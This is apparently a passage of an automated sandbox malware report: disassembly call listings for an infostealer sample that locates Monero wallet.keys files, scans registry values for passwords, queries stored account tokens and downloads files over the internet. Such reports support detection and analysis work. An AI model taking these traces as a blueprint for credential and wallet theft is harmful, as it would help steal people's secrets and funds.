                            • Part of subcall function 00CB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB99EC
                            • Part of subcall function 00CB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CB9A11
                            • Part of subcall function 00CB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CB9A31
                            • Part of subcall function 00CB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CB148F,00000000), ref: 00CB9A5A
                            • Part of subcall function 00CB99C0: LocalFree.KERNEL32(00CB148F), ref: 00CB9A90
                            • Part of subcall function 00CB99C0: CloseHandle.KERNEL32(000000FF), ref: 00CB9A9A
                            • Part of subcall function 00CC93C0: GlobalAlloc.KERNEL32(00000000,00CC43DD,00CC43DD), ref: 00CC93D3
                          • StrStrA.SHLWAPI(?,0189E468), ref: 00CC43F3
                          • GlobalFree.KERNEL32(?), ref: 00CC4512
                            • Part of subcall function 00CB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CB4EEE,00000000,00000000), ref: 00CB9AEF
                            • Part of subcall function 00CB9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00CB4EEE,00000000,?), ref: 00CB9B01
                            • Part of subcall function 00CB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CB4EEE,00000000,00000000), ref: 00CB9B2A
                            • Part of subcall function 00CB9AC0: LocalFree.KERNEL32(?,?,?,?,00CB4EEE,00000000,?), ref: 00CB9B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC44A3
                          • StrCmpCA.SHLWAPI(?,00CD08D1), ref: 00CC44C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00CC44D2
                          • lstrcat.KERNEL32(00000000,?), ref: 00CC44E5
                          • lstrcat.KERNEL32(00000000,00CD0FB8), ref: 00CC44F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: 575362ad4b92cbc727476fba3f964314243e5471c6357ce378a8021333b90d11
                          • Instruction ID: 29acedd2c80ad280441498af6f774b6e34053b598ee45933b9b9376c69327c57
                          • Opcode Fuzzy Hash: 575362ad4b92cbc727476fba3f964314243e5471c6357ce378a8021333b90d11
                          • Instruction Fuzzy Hash: 1E715AB6900208ABDB14EBA0DC5AFEE7379BB88304F04859CF609A7181DA75DB49DF51
                          APIs
                            • Part of subcall function 00CB12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB12B4
                            • Part of subcall function 00CB12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00CB12BB
                            • Part of subcall function 00CB12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00CB12D7
                            • Part of subcall function 00CB12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00CB12F5
                            • Part of subcall function 00CB12A0: RegCloseKey.ADVAPI32(?), ref: 00CB12FF
                          • lstrcat.KERNEL32(?,00000000), ref: 00CB134F
                          • lstrlen.KERNEL32(?), ref: 00CB135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00CB1377
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CC8B60: GetSystemTime.KERNEL32(00CD0E1A,018992C8,00CD05AE,?,?,00CB13F9,?,0000001A,00CD0E1A,00000000,?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CC8B86
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00CB1465
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB99EC
                            • Part of subcall function 00CB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CB9A11
                            • Part of subcall function 00CB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CB9A31
                            • Part of subcall function 00CB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CB148F,00000000), ref: 00CB9A5A
                            • Part of subcall function 00CB99C0: LocalFree.KERNEL32(00CB148F), ref: 00CB9A90
                            • Part of subcall function 00CB99C0: CloseHandle.KERNEL32(000000FF), ref: 00CB9A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 00CB14EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: 138251a77cd45ed4f3909f475f8be306930ee8376df92aeb20b3cb8fb9182643
                          • Instruction ID: 8f7193c37196d408f0328f5f849453bba6e1b1b405f972e8b23f32d000216ca3
                          • Opcode Fuzzy Hash: 138251a77cd45ed4f3909f475f8be306930ee8376df92aeb20b3cb8fb9182643
                          • Instruction Fuzzy Hash: 525121B1D5011C5BCB15EB60DC96FED733CAB54304F4041ACF60AA6082EE706B8ADFA6
                          APIs
                            • Part of subcall function 00CB72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00CB733A
                            • Part of subcall function 00CB72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00CB73B1
                            • Part of subcall function 00CB72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00CB740D
                            • Part of subcall function 00CB72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00CB7452
                            • Part of subcall function 00CB72D0: HeapFree.KERNEL32(00000000), ref: 00CB7459
                          • lstrcat.KERNEL32(00000000,00CD17FC), ref: 00CB7606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00CB7648
                          • lstrcat.KERNEL32(00000000, : ), ref: 00CB765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00CB768F
                          • lstrcat.KERNEL32(00000000,00CD1804), ref: 00CB76A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00CB76D3
                          • lstrcat.KERNEL32(00000000,00CD1808), ref: 00CB76ED
                          • task.LIBCPMTD ref: 00CB76FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                          • String ID: :
                          • API String ID: 2677904052-3653984579
                          • Opcode ID: 0ed67447b16840b99c0843e9e395e81d25c648bfa706a607051e11491b6501bf
                          • Instruction ID: 4626daa54428301cb4b7e7fef942e02660d82b9b81f3a38a0a4407d35d54730b
                          • Opcode Fuzzy Hash: 0ed67447b16840b99c0843e9e395e81d25c648bfa706a607051e11491b6501bf
                          • Instruction Fuzzy Hash: EA314EB1901109EFCB08EBB5DC9ADFE7778BB84301F184128F506BB291DA34A94ADB51
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0189E1F8,00000000,?,00CD0E2C,00000000,?,00000000), ref: 00CC8130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC8137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00CC8158
                          • __aulldiv.LIBCMT ref: 00CC8172
                          • __aulldiv.LIBCMT ref: 00CC8180
                          • wsprintfA.USER32 ref: 00CC81AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2774356765-3474575989
                          • Opcode ID: cd03d54873ba6de7b1fa164cb8e90aa29ccb0cf4c74479243d955347e5a89180
                          • Instruction ID: 6e1db13288829fabc303309865fc8ce9e78f24da8cf07612d633e92e80122315
                          • Opcode Fuzzy Hash: cd03d54873ba6de7b1fa164cb8e90aa29ccb0cf4c74479243d955347e5a89180
                          • Instruction Fuzzy Hash: 18213BB1E44248ABDB00DFD5CC49FAFB7B8FB44B10F144119F605BB280D77869058BA5
                          APIs
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CB4839
                            • Part of subcall function 00CB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CB4849
                          • InternetOpenA.WININET(00CD0DF7,00000001,00000000,00000000,00000000), ref: 00CB610F
                          • StrCmpCA.SHLWAPI(?,0189E6F8), ref: 00CB6147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00CB618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00CB61B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00CB61DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00CB620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00CB6249
                          • InternetCloseHandle.WININET(?), ref: 00CB6253
                          • InternetCloseHandle.WININET(00000000), ref: 00CB6260
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: e6a14ae941e78c0095bc2a396b6636ca5ae8fcf33f6e137f0f7a74687c628a58
                          • Instruction ID: dd8e71af95cbd4c2e936dd748229da40106144fff3cab99cc074df9bb9b79fde
                          • Opcode Fuzzy Hash: e6a14ae941e78c0095bc2a396b6636ca5ae8fcf33f6e137f0f7a74687c628a58
                          • Instruction Fuzzy Hash: A95161B1900208AFDB20DF51DC49FEE77B8EB44705F1040A9E609A71C0DB746A89DF56
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00CB733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00CB73B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00CB740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00CB7452
                          • HeapFree.KERNEL32(00000000), ref: 00CB7459
                          • task.LIBCPMTD ref: 00CB7555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuetask
                          • String ID: Password
                          • API String ID: 775622407-3434357891
                          • Opcode ID: 608dbe2ecdbd961af392f03cbebc2f2305647f0c96bca44bd860344c7334b8d9
                          • Instruction ID: 432f6d74dbff0d727a79399486a456140d2b5d38189e7072799e94d866058f66
                          • Opcode Fuzzy Hash: 608dbe2ecdbd961af392f03cbebc2f2305647f0c96bca44bd860344c7334b8d9
                          • Instruction Fuzzy Hash: 69613BB59041689BDB24DF50DC45BD9B7BCBF44340F0081E9E649A6141DFB06BC9DFA1
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                          • lstrlen.KERNEL32(00000000), ref: 00CBBC9F
                            • Part of subcall function 00CC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CC8E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 00CBBCCD
                          • lstrlen.KERNEL32(00000000), ref: 00CBBDA5
                          • lstrlen.KERNEL32(00000000), ref: 00CBBDB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: 3e93e44e32e03a45424aeea7e60c53ff9ff047981e97f833fcfd21d222e6f682
                          • Instruction ID: 2327d980b64e228c44c7c5aa36d6b61b24d0f9724f0b8f14a5ed0ddb43d21bc3
                          • Opcode Fuzzy Hash: 3e93e44e32e03a45424aeea7e60c53ff9ff047981e97f833fcfd21d222e6f682
                          • Instruction Fuzzy Hash: 2CB12C7191010CABDB14FBA0DD9AFEE7338AF54304F44416DF506A61A1EF346E49DBA2
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: 1996c522e0aab79726539ac115c653da8e4446b9d9d39c9cad52708edc79b5ae
                          • Instruction ID: 8740dd756725a399766b2f7df469db4a4d9bd51c6eba78a175d553081c590be4
                          • Opcode Fuzzy Hash: 1996c522e0aab79726539ac115c653da8e4446b9d9d39c9cad52708edc79b5ae
                          • Instruction Fuzzy Hash: 86F03A70904209EFD344AFE2E909F3C7BB0FB45702F0801AAE609AA2D0D6705B41DBD6
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00CB4FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CB4FD1
                          • InternetOpenA.WININET(00CD0DDF,00000000,00000000,00000000,00000000), ref: 00CB4FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00CB5011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00CB5041
                          • InternetCloseHandle.WININET(?), ref: 00CB50B9
                          • InternetCloseHandle.WININET(?), ref: 00CB50C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: 54cbb90657f0a5fe97106b835d5a40fd6e7b8c5d2d88650822785420e51941dd
                          • Instruction ID: cc19a2d04fc09a36a9b90ecaea6ec2ea8ac06feaaa7c5a107839a16c2f532818
                          • Opcode Fuzzy Hash: 54cbb90657f0a5fe97106b835d5a40fd6e7b8c5d2d88650822785420e51941dd
                          • Instruction Fuzzy Hash: F431E6F4A40218ABDB20DF55DC85BECB7B4EB48704F1081E9EA09B7281D7706A85CF99
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00CC8426
                          • wsprintfA.USER32 ref: 00CC8459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00CC847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CC848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CC8499
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                          • RegQueryValueExA.ADVAPI32(00000000,0189E228,00000000,000F003F,?,00000400), ref: 00CC84EC
                          • lstrlen.KERNEL32(?), ref: 00CC8501
                          • RegQueryValueExA.ADVAPI32(00000000,0189E240,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00CD0B34), ref: 00CC8599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CC8608
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CC861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: c787b7b6a08e32b322afd57f22eb8746890d8ae9dcb587bbb9b5a103134e1b8d
                          • Instruction ID: e155efad491be5256a33f9de10672484a87480dce7293b578c0a034cf277ab5a
                          • Opcode Fuzzy Hash: c787b7b6a08e32b322afd57f22eb8746890d8ae9dcb587bbb9b5a103134e1b8d
                          • Instruction Fuzzy Hash: A421EAB191021CAFDB24DB54DC85FE9B3B8FB48704F04C5A9E609A6180DF716A85CFD4
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CC76A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC76AB
                          • RegOpenKeyExA.ADVAPI32(80000002,0188BD08,00000000,00020119,00000000), ref: 00CC76DD
                          • RegQueryValueExA.ADVAPI32(00000000,0189E180,00000000,00000000,?,000000FF), ref: 00CC76FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CC7708
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
